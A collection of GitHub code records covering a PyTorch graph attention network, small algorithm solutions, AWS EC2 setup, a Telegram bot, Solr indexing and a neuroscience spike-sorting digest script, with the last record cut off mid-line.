+{"seq_id":"34677821558","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport random\r\n\r\nfrom Network_weight_init import weight_init\r\n\r\n# forward gathers each node's neighborhood information; the corresponding\r\n# per-node helper (att) implements the single-node operation\r\nclass Attention(nn.Module):\r\n    def __init__(self, input_channel, output_channel, dev, head=1):\r\n        super(Attention, self).__init__()\r\n        self.att_line = []\r\n        self.line = []\r\n        self.head = head\r\n        self.att_line = nn.Linear(2*output_channel, 1, device=dev, bias=False)\r\n        self.line = nn.Linear(input_channel, output_channel, device=dev)\r\n        # Multi-head attention; here we use the most direct construction of simply repeating linear layers\r\n        if head > 1:\r\n            self.att_line1 = nn.Linear(2*output_channel, 1, device=dev, bias=False)\r\n            self.line1 = nn.Linear(input_channel, output_channel, device=dev)\r\n        if head > 2:\r\n            self.att_line2 = nn.Linear(2*output_channel, 1, device=dev, bias=False)\r\n            self.line2 = nn.Linear(input_channel, output_channel, device=dev)\r\n        if head > 3:\r\n            self.att_line3 = nn.Linear(2*output_channel, 1, device=dev, bias=False)\r\n            self.line3 = nn.Linear(input_channel, output_channel, device=dev)\r\n        self.device = dev\r\n\r\n    def forward(self, X, A):\r\n        node_num, _ = A.size()\r\n        first = True\r\n        load_list = range(node_num)\r\n        for i in load_list:\r\n            neibor_feature = X[A[i].bool()]\r\n            if first:\r\n                result = Attention.att(self, X[i], neibor_feature)\r\n                first = False\r\n
            else:\r\n                result = torch.cat((result, Attention.att(self, X[i], neibor_feature)), dim=0)\r\n        return result\r\n\r\n    def att(self, xi, xj):\r\n        node_num, feature_num = xj.size()\r\n        # result=torch.tensor(0,dtype=torch.float,device=self.device,requires_grad=True)\r\n        xj = torch.cat((xi.view(-1, feature_num), xj), dim=0)\r\n        xi_bar = self.line(xi)\r\n        xj_bar = self.line(xj)\r\n        xi_bar = xi_bar.expand(xj_bar.size())\r\n        aj = torch.cat((xi_bar, xj_bar), dim=1)\r\n        aj = F.leaky_relu(self.att_line(aj)).view(-1)\r\n        aj = F.softmax(aj, dim=0)\r\n        xj_bar = torch.matmul(aj, xj_bar).view(1, -1)\r\n\r\n        if self.head > 1:\r\n            xi_bar1 = self.line1(xi)\r\n            xj_bar1 = self.line1(xj)\r\n            xi_bar1 = xi_bar1.expand(xj_bar1.size())\r\n            aj1 = torch.cat((xi_bar1, xj_bar1), dim=1)\r\n            aj1 = F.leaky_relu(self.att_line1(aj1)).view(-1)\r\n            aj1 = F.softmax(aj1, dim=0)\r\n            xj_bar1 = torch.matmul(aj1, xj_bar1).view(1, -1)\r\n            xj_bar = xj_bar + xj_bar1\r\n        if self.head > 2:\r\n            xi_bar2 = self.line2(xi)\r\n            xj_bar2 = self.line2(xj)\r\n            xi_bar2 = xi_bar2.expand(xj_bar2.size())\r\n            aj2 = torch.cat((xi_bar2, xj_bar2), dim=1)\r\n            aj2 = F.leaky_relu(self.att_line2(aj2)).view(-1)\r\n            aj2 = F.softmax(aj2, dim=0)\r\n            xj_bar2 = torch.matmul(aj2, xj_bar2).view(1, -1)\r\n            xj_bar = xj_bar + xj_bar2\r\n        if self.head > 3:\r\n            xi_bar3 = self.line3(xi)\r\n            xj_bar3 = self.line3(xj)\r\n            xi_bar3 = xi_bar3.expand(xj_bar3.size())\r\n            aj3 = torch.cat((xi_bar3, xj_bar3), dim=1)\r\n            aj3 = F.leaky_relu(self.att_line3(aj3)).view(-1)\r\n            aj3 = F.softmax(aj3, dim=0)\r\n            xj_bar3 = torch.matmul(aj3, xj_bar3).view(1, -1)\r\n            xj_bar = xj_bar + xj_bar3\r\n\r\n        xj_bar = xj_bar/self.head\r\n        # result=result+xj_bar\r\n        # result=result/self.head_num\r\n        return xj_bar\r\n\r\n\r\nclass GAT(nn.Module):\r\n    def __init__(self, feature_num, output_channel1, output_channel2, class_num, dev, dataset_type, head=1, shuffle=True):\r\n        super(GAT, self).__init__()\r\n        self.device = dev\r\n        self.shuffle = shuffle\r\n        head1 = 1\r\n        head2 = 1\r\n        if head > 1:\r\n            head1 = head\r\n            head2 = 2\r\n        self.Att1 = Attention(feature_num, output_channel1, dev, head1)\r\n        self.Att2 = Attention(output_channel1, output_channel2, dev, head2)\r\n        self.line1 = nn.Linear(output_channel2, class_num, device=dev)\r\n        self.Att1.apply(weight_init)\r\n        self.Att2.apply(weight_init)\r\n        self.line1.apply(weight_init)\r\n        self.dataset_type = dataset_type\r\n        self.class_num = class_num\r\n        self.feature_num = feature_num\r\n        self.output_channel1 = output_channel1\r\n\r\n    def forward(self, X, A):\r\n        X = X.to(self.device)\r\n        A = A.to(self.device)\r\n        X = self.Att1(X, A)\r\n        X = F.dropout(X, training=self.training)\r\n        X = self.Att2(X, A)\r\n        X = self.line1(X)\r\n        if self.dataset_type == 1:\r\n            X = torch.mean(X, dim=0).view(1, -1)\r\n        return F.log_softmax(X, dim=1)","repo_name":"Sophie10001b/AI_class_design","sub_path":"GAT.py","file_name":"GAT.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
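The Attention.forward above visits nodes one at a time in a Python loop. For reference, the same neighborhood-masked attention weights can be computed for the whole graph in one shot; this is an illustrative sketch of the standard GAT scoring, not a drop-in replacement for the class above.

import torch
import torch.nn.functional as F

def masked_attention_weights(h: torch.Tensor, adj: torch.Tensor, a: torch.Tensor) -> torch.Tensor:
    """h: (N, F') projected node features, adj: (N, N) 0/1 adjacency, a: (2*F',) attention vector."""
    f = h.size(1)
    # e[i, j] = leaky_relu(a^T [h_i || h_j]), computed for all pairs at once
    e = F.leaky_relu((h @ a[:f]).unsqueeze(1) + (h @ a[f:]).unsqueeze(0))
    # restrict to real neighbors; assumes every node has at least one neighbor
    # (e.g. a self-loop), otherwise a fully masked row softmaxes to NaN
    e = e.masked_fill(adj == 0, float('-inf'))
    return F.softmax(e, dim=1)  # each row sums to 1 over its neighborhood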
+{"seq_id":"33731245439","text":"# -*- coding:utf-8 -*-\n__author__ = 'yyp'\n__date__ = '2018-5-26 3:42'\n\n'''\nGiven a string, find the length of the longest substring without repeating characters.\nExamples:\nGiven \"abcabcbb\", the answer is \"abc\", whose length is 3.\nGiven \"bbbbb\", the answer is \"b\", with the length of 1.\nGiven \"pwwkew\", the answer is \"wke\", with the length of 3. Note that the answer must be a substring; \"pwke\" is a subsequence, not a substring.\n'''\n\n\nclass Solution:\n    \"\"\"\n    Time:  O(n)\n    Space: O(1)\n    \"\"\"\n\n    def lengthOfLongestSubstring(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        l, res, freq = 0, 0, [False for _ in range(256)]\n        for idx, char in enumerate(s):\n            if freq[ord(char)]:\n                # shrink the window from the left until the duplicate is dropped\n                while s[l] != char:\n                    freq[ord(s[l])] = False\n                    l += 1\n                l += 1\n            else:\n                freq[ord(char)] = True\n                res = max(idx - l + 1, res)\n        return res\n","repo_name":"boluopower/leetcode-mypractice","sub_path":"Array/3_longest_substring_without_repeating_characters.py","file_name":"3_longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"2665435644","text":"\"\"\"\nThis module contains useful functions to interface with the HiCAT simulator.\n\"\"\"\n\nimport logging\nfrom astropy.io import fits\nimport os\n\nfrom pastis.config import CONFIG_PASTIS\n\nlog = logging.getLogger()\n\ntry:\n    import hicat.simulators\nexcept ImportError:\n    log.info('HiCAT simulator not imported.')\n\n\ndef set_up_hicat(apply_continuous_dm_maps=False):\n    \"\"\"Return a configured instance of the HiCAT simulator.\n\n    Sets the pupil mask, whether the IrisAO is in or out, apodizer, Lyot stop and detector. Optionally, loads DM maps\n    onto the two continuous face-sheet Boston DMs.\n\n    Parameters\n    ----------\n    apply_continuous_dm_maps : bool, default False\n        whether to load BostonDM maps from path specified in configfile\n\n    Returns\n    -------\n    hicat_sim : instance of HICAT_Sim()\n    \"\"\"\n\n    hicat_sim = hicat.simulators.hicat_sim.HICAT_Sim()\n    hicat_sim.iris_dm.flatten()\n\n    hicat_sim.pupil_mask = CONFIG_PASTIS.get('HiCAT', 'pupil_mask')  # fixed attribute typo ('pupil_maskmask'); I will likely have to implement a new pupil mask\n    hicat_sim.iris_ao = CONFIG_PASTIS.get('HiCAT', 'iris_ao')\n    hicat_sim.apodizer = CONFIG_PASTIS.get('HiCAT', 'apodizer')\n    hicat_sim.lyot_stop = CONFIG_PASTIS.get('HiCAT', 'lyot_stop')\n    hicat_sim.detector = 'imager'\n\n    log.info(hicat_sim.describe())\n\n    # Load Boston DM maps into HiCAT simulator\n    if apply_continuous_dm_maps:\n        path_to_dh_solution = CONFIG_PASTIS.get('HiCAT', 'dm_maps_path')\n        dm1_surface, dm2_surface = read_continuous_dm_maps_hicat(path_to_dh_solution)\n        hicat_sim.dm1.set_surface(dm1_surface)\n        hicat_sim.dm2.set_surface(dm2_surface)\n\n        log.info(f'BostonDM maps applied from {path_to_dh_solution}.')\n\n    return hicat_sim\n\n\ndef read_continuous_dm_maps_hicat(path_to_dm_maps):\n    \"\"\"Read Boston DM maps from disk and return as one list per DM.\n\n    Hijacked partially from StrokeMinimization.restore_last_strokemin_dm_shapes()\n\n    Parameters\n    ----------\n    path_to_dm_maps : string\n        absolute path to folder containing DM maps to load\n\n    Returns\n    -------\n    DM1 actuator map array and DM2 actuator map array; in m\n    \"\"\"\n\n    surfaces = []\n    for dmnum in [1, 2]:\n        actuators_2d = fits.getdata(os.path.join(path_to_dm_maps, f'dm{dmnum}_command_2d_noflat.fits'))\n        surfaces.append(actuators_2d)\n\n    return surfaces[0], surfaces[1]\n","repo_name":"spacetelescope/PASTIS","sub_path":"pastis/simulators/hicat_imaging.py","file_name":"hicat_imaging.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"29"}
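The helper above reads 2-D DM command maps with astropy; a self-contained round-trip showing the same I/O pattern (the file name and array contents here are made up for illustration).

import os
import tempfile

import numpy as np
from astropy.io import fits

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, 'dm1_command_2d_noflat.fits')
    command = np.zeros((34, 34))   # hypothetical actuator grid
    command[17, 17] = 1e-8         # poke one actuator (meters)
    fits.writeto(path, command)
    recovered = fits.getdata(path)  # same call the module above uses
    assert np.allclose(recovered, command)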
+{"seq_id":"6852027905","text":"# coding: utf-8\nimport boto3\nimport os\nimport stat\n\n# Create a session\nsession = boto3.Session(profile_name=\"Liam\")\nec2 = session.resource('ec2')\n\n# Create an SSH key and save it with user-only permissions\nkey_name = 'ec2_automation_key'\nkey_path = key_name + \".pem\"\nkey = ec2.create_key_pair(KeyName=key_name)\nwith open(key_path, 'w') as f:\n    f.write(key.key_material)\nos.chmod(key_path, stat.S_IRUSR | stat.S_IWUSR)\n\n# Create an EC2 instance\nec2.images.filter(Owners=['amazon'])\nimg = ec2.Image(\"ami-0323c3dd2da7fb37d\")\nami_name = 'amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2'\nfilters = [{\"Name\":\"name\",\"Values\":[ami_name]}]\ninstances = ec2.create_instances(ImageId=img.id, MinCount=1, MaxCount=1, InstanceType='t2.micro', KeyName=key.key_name)\ninst = instances[0]\ninst.reload()\n\n# Configure the security group\nsg = ec2.SecurityGroup(inst.security_groups[0][\"GroupId\"])\n\n# SSH for a personal IP only\nsg.authorize_ingress(IpPermissions=[{\"FromPort\":22,\"ToPort\":22,\"IpProtocol\":\"TCP\",\"IpRanges\":[{\"CidrIp\":\"162.222.59.204/32\"}]}])\n\n# HTTP for all\nsg.authorize_ingress(IpPermissions=[{\"FromPort\":80,\"ToPort\":80,\"IpProtocol\":\"TCP\",\"IpRanges\":[{\"CidrIp\":\"0.0.0.0/0\"}]}])\n","repo_name":"LiamWoodRoberts/automatingAWS","sub_path":"nodeotron/ec2_example.py","file_name":"ec2_example.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
+{"seq_id":"28981256247","text":"# Scrapy settings for bostonsing project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n#     http://doc.scrapy.org/topics/settings.html\n#\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\n\nBOT_NAME = 'bostonsing'\nBOT_VERSION = '1.0'\n\nSPIDER_MODULES = ['bostonsing.spiders']\nNEWSPIDER_MODULE = 'bostonsing.spiders'\nUSER_AGENT = '%s/%s' % (BOT_NAME, BOT_VERSION)\n","repo_name":"marktgodfrey/fasolaminutes_parsing","sub_path":"bostonsing/bostonsing/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"}
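For reference, module-level settings like the ones in the record above are what Scrapy loads at startup; they can be inspected programmatically. Illustrative only; this assumes it runs inside the project (a scrapy.cfg present, or SCRAPY_SETTINGS_MODULE=bostonsing.settings exported).

from scrapy.utils.project import get_project_settings

settings = get_project_settings()
print(settings.get('BOT_NAME'))    # -> 'bostonsing'
print(settings.get('USER_AGENT'))  # -> 'bostonsing/1.0'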
+{"seq_id":"13538813601","text":"\"\"\"\nLuferov Victor\n\nFuzzy Rules\n\"\"\"\nfrom typing import List\nfrom .terms import Term\nfrom .types import OperatorType, HedgeType\nfrom .variables import FuzzyVariable, SugenoVariable, SugenoFunction\n\n\nclass SingleCondition:\n    \"\"\"\n    A single condition (or conclusion):\n    FuzzyVariable - Term\n    SugenoVariable - SugenoFunction\n    \"\"\"\n\n    def __init__(self, variable: [FuzzyVariable, SugenoVariable], term: [Term, SugenoFunction], not_: bool = False):\n        self.variable: [FuzzyVariable, SugenoVariable] = variable\n        self.term: [Term, SugenoFunction] = term\n        self.not_: bool = not_\n\n\nclass Conditions:\n\n    def __init__(self, conditions: [List, None] = None, op: OperatorType = OperatorType.AND, not_: bool = False):\n        self.conditions: List = conditions if conditions is not None else []\n        self.op: OperatorType = op\n        self.__not: bool = not_\n\n    @property\n    def not_(self):\n        return self.__not\n\n\nclass FuzzyCondition(SingleCondition):\n    \"\"\"\n    Fuzzy condition\n    \"\"\"\n\n    def __init__(self,\n                 variable: [FuzzyVariable, SugenoVariable],\n                 term: [Term, SugenoFunction],\n                 not_: bool = False,\n                 hedge: HedgeType = HedgeType.NULL):\n\n        super().__init__(variable, term, not_)\n        self.hedge: HedgeType = hedge\n\n\nclass FuzzyRule:\n    \"\"\"\n    Generalized model of a fuzzy rule.\n    - The fuzzy condition \"condition\" is the same for Sugeno and Mamdani systems.\n\n    - The fuzzy conclusion \"conclusion\" for Sugeno:\n      conclusion: SingleCondition = SingleCondition(SugenoVariable, SugenoFunction, not?)\n    - The fuzzy conclusion \"conclusion\" for Mamdani:\n      conclusion: SingleCondition = SingleCondition(FuzzyVariable, Term, not?)\n    \"\"\"\n\n    def __init__(self, condition: Conditions, conclusion: SingleCondition, weight: float = 1.):\n        \"\"\"\n        Constructor of a Mamdani fuzzy rule\n        :param condition: the condition in the IF block\n        :param conclusion: the conclusion in the THEN block\n        :param weight: additional weight of the rule\n        \"\"\"\n        self.condition: Conditions = condition\n        self.conclusion: SingleCondition = conclusion\n        self.weight: float = weight\n","repo_name":"Luferov/FuzzyLogicToolBox","sub_path":"fuzzy_logic/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"29"}
+{"seq_id":"2524684084","text":"# Solution 1: the standard approach, using recursion\r\n# Works by reducing K instead of doing an n-way split\r\n# Note that index 0 corresponds to k = 1\r\nimport sys\r\nK = int(sys.stdin.readline())\r\n\r\n\r\ndef d_c(order, count):\r\n    if not order:\r\n        return count\r\n    expo = len(format(order, 'b'))\r\n    x = order - 2**(expo-1)\r\n    return d_c(x, count+1)\r\n\r\n\r\nprint(d_c(K-1, 0) % 2)\r\n\r\n\r\n# Solution 2: my first idea; increase the count whenever the bits flip between 0 and 1 in binary,\r\n# i.e. count the 1 bits in the binary representation and take the remainder mod 2\r\n\r\nimport sys\r\nK = int(sys.stdin.readline())\r\nprint(format(K-1, 'b').count('1') % 2)\r\n","repo_name":"mnmsgit/ProblemSolving","sub_path":"백준/Silver/18222. 투에-모스 문자열/투에-모스 문자열.py","file_name":"투에-모스 문자열.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
+{"seq_id":"9082102302","text":"# polygon algorithm\nimport numpy as np  # needed for np.NaN below; this import was missing in the original\n\ndef raycasting(p, poly):\n    # for each edge; p is the port location, poly is the list of ECA area vertices\n    flag = False\n    polygon = tuple(poly[:]) + (poly[0],)\n    for i in range(0, (len(polygon) - 1)):\n        j = i + 1\n        sx = polygon[i]['Latitude']\n        sy = polygon[i]['Longitude']\n        tx = polygon[j]['Latitude']\n        ty = polygon[j]['Longitude']\n\n        x = np.NaN\n        # point lies between the two polygon points on the y axis\n        if ((p[1] < ty and p[1] > sy) or (p[1] < sy and p[1] > ty)):\n            # intersection of the horizontal ray with the edge\n            x = sx + (p[1] - sy)*(tx - sx)/(ty - sy)\n\n            # point lies on the edge\n            if x == p[0]:\n                flag = True\n\n            # ray casting: the ray crosses the edge\n            if x > p[0]:\n                flag = not flag\n\n        # polygon vertex coincides with the port location\n        if ((sx == p[0] and sy == p[1]) or (tx == p[0] and ty == p[1])):\n            flag = True\n\n    return flag\n","repo_name":"triangel8866/PNpoly-algorithm","sub_path":"PNpoly.py","file_name":"PNpoly.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
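A quick cross-check of the ray-casting routine above against shapely (illustrative only; shapely is an extra dependency, and the vertex dicts mirror the {'Latitude', 'Longitude'} format the function expects).

from shapely.geometry import Point, Polygon

square = [{'Latitude': 0, 'Longitude': 0},
          {'Latitude': 4, 'Longitude': 0},
          {'Latitude': 4, 'Longitude': 4},
          {'Latitude': 0, 'Longitude': 4}]
reference = Polygon([(v['Latitude'], v['Longitude']) for v in square])

# one interior point, two exterior points
for p in [(2, 2), (5, 2), (2, 5)]:
    assert raycasting(p, square) == reference.contains(Point(p))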
[Button.inline(f\"Да, получаю среднее профессиональное образование\", f'help_theme_no_4_2:0'.encode())],\r\n [Button.inline(f\"Нет, не получаю\", f'help_theme_no_4_1_0:0'.encode())]]\r\n \r\n return \"Получаете ли вы образование?\", markup","repo_name":"SuRoryz/accel-2023-bot","sub_path":"commands/commandHelpThemeNo3.py","file_name":"commandHelpThemeNo3.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"24191488052","text":"import os\nimport io\nimport csv\nimport json\nimport pysolr\nfrom nltk import tokenize\nfrom nltk.corpus import stopwords\nimport collections\nimport pandas as pd\n\n\n\"\"\"Indexing all the files to Apache-solr server\"\"\"\n\nclass indexing:\n\n \"\"\"\n Reading files from the data set(local disk) and storing it with\n corresponding filename.\n \"\"\"\n def readfiles(self,path):\n data=[] #to store data in the file\n file_list=[] #to store the name of the files\n for file in sorted(os.listdir(path),key=lambda x: int(x.split('.')[0])):\n with io.open(path + file, 'r', encoding='utf-8', errors='ignore') as f:\n data.append(f.read())\n file_list.append(file)\n return data,file_list\n\n \"\"\"\n Tokenizing each files and storing it in the data list\n \"\"\"\n def tokenizing(self,data):\n\n for i in range(len(data)):\n sentences = tokenize.sent_tokenize(data.pop(i).strip())\n temp = sentences.pop(0).split('\\n\\n')\n if len(temp) == 2:\n sentences.insert(0, temp[1])\n data.insert(i, sentences)\n return data\n\n \"\"\"\n Performing word tokenizing for each files and \n removing the stopwords like 'the','that'...etc \n \"\"\"\n def indexing_words(self,data,file_list):\n indexedWord=collections.OrderedDict()\n indexedSentence = collections.OrderedDict()\n for i in range(len(data)):\n index=file_list[i]\n indexedWord[index]=[]\n for sentence in data[i]:\n indexedWord[index].extend(list(set(tokenize.word_tokenize(sentence))))\n indexedWord[index]=self.removing_stopwords(indexedWord[index])\n return indexedWord\n\n \"\"\"\n Removing stopwords\n \"\"\"\n def removing_stopwords(self,indexedwords):\n stop_words=stopwords.words(\"english\")\n temp=[]\n for word in indexedwords:\n if word.lower() not in stop_words:\n temp.append(word)\n return temp\n\n\n \"\"\"\n Starting of preprocessing\n \"\"\"\n def preprocess(self,path):\n print(\"Preprocessing...\")\n data,file_list=self.readfiles(path)\n data=self.tokenizing(data)\n indexWord=self.indexing_words(data,file_list)\n\n wordsDFrame = pd.DataFrame(list(indexWord.items()), columns=['id', 'words'])\n jsonFileName = 'words.json'\n wordsDFrame.to_json(jsonFileName, orient='records')\n return jsonFileName,indexWord,data,file_list\n\n \"\"\"\n Adding the json file to Apache-solr\n \"\"\"\n def add_to_solr(self,jsonFileName):\n solr=pysolr.Solr('http://localhost:8983/solr/semantic')\n solr.delete(q='*:*')\n with open(\"/Users/dinesh dk/Documents/mindtree/code/\" + jsonFileName,'rb') as jsonFile:\n entry = json.load(jsonFile)\n solr.add(entry)\n #print(\"added\")\n\n \"\"\"performing searching in Apache-solr\"\"\"\n def searchInSolr(self,query, indexSentenceMap,data,file_list):\n solr = pysolr.Solr('http://localhost:8983/solr/semantic')\n query = \"words:\" + \" || words:\".join(query)\n print(\"Search Query: \", query)\n results = solr.search(query)\n for result in results:\n d=result['id']\n ind=file_list.index(d)\n print(d,\"\".join(data[ind]),sep=\"\\n\")\n print(\"\\n\\n\")\n\n\n def returnpath(self):\n return \"/Users/dinesh 
dk/Documents/mindtree/Data Set/\"\n\n\n\nif __name__ == '__main__':\n indexing_obj=indexing()\n path=\"/Users/dinesh dk/Documents/mindtree/Data Set/\"\n jsonfilename,indexwords,data,file_list=indexing_obj.preprocess(path)\n indexing_obj.add_to_solr(jsonfilename)\n # query=input(\"Enter the query:\")\n # indexing_obj.searchInSolr(list(set(tokenize.word_tokenize(query))),indexwords,data,file_list)","repo_name":"dineshdk1100/Semantic-Search-Engine","sub_path":"code/indexing.py","file_name":"indexing.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25312943672","text":"from typing import Union\nimport os\nimport json\nimport numpy as np\nimport numpy.typing as npt\nimport zarr\nfrom .helpers.compute_templates import compute_templates\nfrom .helpers.compute_correlogram_data import compute_correlogram_data\nfrom .helpers.extract_snippets import extract_snippets_in_channel_neighborhood\nfrom .SpikeTrains import SpikeTrains, SpikeTrain\nfrom .Autocorrelograms import create_autocorrelograms\nfrom .CrossCorrelograms import create_cross_correlograms\nfrom .AverageWaveforms import AverageWaveforms, AverageWaveformItem\n\ndef create_spike_sorting_digest(*,\n recording,\n sorting,\n output_path: str,\n num_channels_per_neighborhood: int,\n subsample_segment_duration_sec: float,\n subsample_total_duration_sec: float\n):\n if not output_path.endswith('.ns-ssd'):\n raise Exception('Output path must end with .ns-ssd')\n \n print(f'Creating spike sorting digest...')\n print(f'Output path: {output_path}')\n\n # require that output folder does not exist\n if os.path.exists(output_path):\n raise Exception(f'Output folder already exists: {output_path}')\n \n # create the output folder\n os.makedirs(output_path)\n \n import spikeinterface as si\n\n recording: si.BaseRecording = recording\n sorting: si.BaseSorting = sorting\n\n unit_ids = serialize_ids(sorting.get_unit_ids())\n channel_ids = serialize_ids(recording.get_channel_ids())\n\n print('Creating autocorrelograms.ns-acg...')\n create_autocorrelograms(\n sorting=sorting,\n output_path=f'{output_path}/autocorrelograms.ns-acg',\n )\n\n print(f'Creating spike_trains.ns-spt...')\n spike_trains: list[SpikeTrain] = []\n for unit_id in unit_ids:\n spike_times = sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_trains.append(SpikeTrain(\n unit_id=unit_id,\n spike_times_sec=spike_times.astype(np.float32)\n ))\n X = SpikeTrains(\n start_time_sec=0,\n end_time_sec=recording.get_num_frames() / recording.get_sampling_frequency(),\n spike_trains=spike_trains\n )\n X.save(f'{output_path}/spike_trains.ns-spt', block_size_sec=300)\n\n data_zarr_fname = f'{output_path}/data.zarr'\n data_zarr_root_group = zarr.open(data_zarr_fname, mode=\"w\")\n\n # Extracting subsampled traces\n print('Extracting subsampled traces...')\n subsampled_traces = get_subsampled_traces(\n recording=recording,\n segment_duration_sec=subsample_segment_duration_sec,\n total_duration_sec=subsample_total_duration_sec\n )\n\n # Writing subsampled traces\n print('Writing subsampled traces...')\n data_zarr_root_group.create_dataset(\"subsampled_traces\", data=subsampled_traces, chunks=(1000000, len(channel_ids)))\n\n # Creating subsampled sorting\n print('Creating subsampled sorting...')\n subsampled_sorting = get_subsampled_sorting(\n recording=recording,\n sorting=sorting,\n segment_duration_sec=subsample_segment_duration_sec,\n total_duration_sec=subsample_total_duration_sec\n )\n\n # 
Creating subsampled_spike_trains.ns-spt\n print('Creating subsampled_spike_trains.ns-spt...')\n spike_trains: list[SpikeTrain] = []\n for unit_id in unit_ids:\n spike_times = subsampled_sorting.get_unit_spike_train(unit_id, segment_index=0)\n spike_trains.append(SpikeTrain(\n unit_id=unit_id,\n spike_times_sec=spike_times.astype(np.float32)\n ))\n X = SpikeTrains(\n start_time_sec=0,\n end_time_sec=subsample_total_duration_sec,\n spike_trains=spike_trains\n )\n X.save(f'{output_path}/subsampled_spike_trains.ns-spt', block_size_sec=300)\n\n # Computing full templates\n print('Computing full templates...')\n full_templates = compute_templates(traces=subsampled_traces, sorting=subsampled_sorting)\n\n # Writing full templates\n print('Writing full templates...')\n data_zarr_root_group.create_dataset(\"full_templates\", data=full_templates, chunks=(1000, 1000, len(channel_ids)))\n\n # determine peak channels from full templates\n print('Determining peak channels...')\n peak_channel_indices = np.argmin(np.min(full_templates, axis=1), axis=1)\n peak_channel_ids = [channel_ids[i] for i in peak_channel_indices]\n\n # determine channel neighborhoods from channel locations and peak channels\n print('Determining channel neighborhoods...')\n channel_neighborhoods = []\n for i, unit_id in enumerate(unit_ids):\n peak_channel_id = peak_channel_ids[i]\n peak_channel_index = channel_ids.index(peak_channel_id)\n channel_locations = recording.get_channel_locations()\n peak_channel_location = channel_locations[peak_channel_index]\n channel_distances = np.linalg.norm(channel_locations - peak_channel_location, axis=1)\n # use the closest num_channels_per_neighborhood channels\n channel_neighborhood_indices = np.argsort(channel_distances)[:num_channels_per_neighborhood]\n channel_neighborhood = [channel_ids[i] for i in channel_neighborhood_indices]\n channel_neighborhoods.append({\n 'unit_id': unit_id,\n 'channel_ids': channel_neighborhood,\n 'channel_indices': channel_neighborhood_indices,\n 'peak_channel_id': peak_channel_id\n })\n\n avg_waveforms_list: list[AverageWaveformItem] = []\n \n for unit_id in unit_ids:\n print(f'Processing unit {unit_id}...')\n unit_folder = f'{output_path}/units/{unit_id}'\n os.makedirs(unit_folder)\n\n channel_neighborhood = [x for x in channel_neighborhoods if x['unit_id'] == unit_id][0]\n subsampled_spike_times = subsampled_sorting.get_unit_spike_train(unit_id, segment_index=0)\n subsampled_snippets_in_neighborhood = extract_snippets_in_channel_neighborhood(traces=subsampled_traces, times=subsampled_spike_times, neighborhood=channel_neighborhood[\"channel_indices\"], T1=30, T2=30)\n\n channel_neighborhood_indices = channel_neighborhood['channel_indices']\n channel_locations_in_neighborhood = np.array(recording.get_channel_locations())[channel_neighborhood_indices]\n\n average_waveform_in_neighborhood = np.median(subsampled_snippets_in_neighborhood, axis=0)\n\n # spike amplitudes\n peak_channel_index_in_neighborhood = np.argmin(np.min(average_waveform_in_neighborhood, axis=0))\n subsampled_spike_amplitudes = np.min(subsampled_snippets_in_neighborhood[:, :, peak_channel_index_in_neighborhood], axis=1)\n\n # write unit_info.json\n unit_info = {\n 'channel_neighborhood_ids': channel_neighborhood['channel_ids'],\n 'channel_neighborhood_locations': serialize_channel_locations(channel_locations_in_neighborhood),\n 'peak_channel_id': channel_neighborhood['peak_channel_id'],\n 'num_subsampled_events': len(subsampled_spike_times)\n }\n print(f' Num. 
channels in neighborhood: {len(channel_neighborhood[\"channel_ids\"])}')\n print(f' Peak channel: {channel_neighborhood[\"peak_channel_id\"]}')\n print(f' Num. subsampled events: {len(subsampled_spike_times)}')\n with open(f'{unit_folder}/unit_info.json', 'w') as f:\n json.dump(unit_info, f, indent=2)\n # open data.zarr\n unit_data_zarr_fname = f'{unit_folder}/data.zarr'\n unit_data_zarr_root_group = zarr.open(unit_data_zarr_fname, mode=\"w\")\n unit_data_zarr_root_group.create_dataset(\"subsampled_spike_times\", data=subsampled_spike_times.astype(np.float32), chunks=(100000,))\n unit_data_zarr_root_group.create_dataset(\"average_waveform_in_neighborhood\", data=average_waveform_in_neighborhood.astype(np.float32), chunks=(1000, 1000))\n unit_data_zarr_root_group.create_dataset(\"subsampled_snippets_in_neighborhood\", data=subsampled_snippets_in_neighborhood.astype(np.float32), chunks=(1000, 100, 50))\n unit_data_zarr_root_group.create_dataset(\"subsampled_spike_amplitudes\", data=subsampled_spike_amplitudes.astype(np.float32), chunks=(10000,))\n\n avg_waveforms_list.append(AverageWaveformItem(\n unit_id=unit_id,\n channel_ids=channel_neighborhood['channel_ids'],\n waveform=average_waveform_in_neighborhood\n ))\n \n # Writing average_waveforms.awf\n print('Writing average_waveforms.ns-awf...')\n channel_locations_dict = {}\n for i in range(len(channel_ids)):\n channel_locations_dict[str(channel_ids[i])] = recording.get_channel_locations()[i, :].tolist()\n X_avg_waveforms = AverageWaveforms(\n average_waveforms=avg_waveforms_list,\n channel_locations=channel_locations_dict\n )\n X_avg_waveforms.save(f'{output_path}/average_waveforms.ns-awf')\n \n # Computing 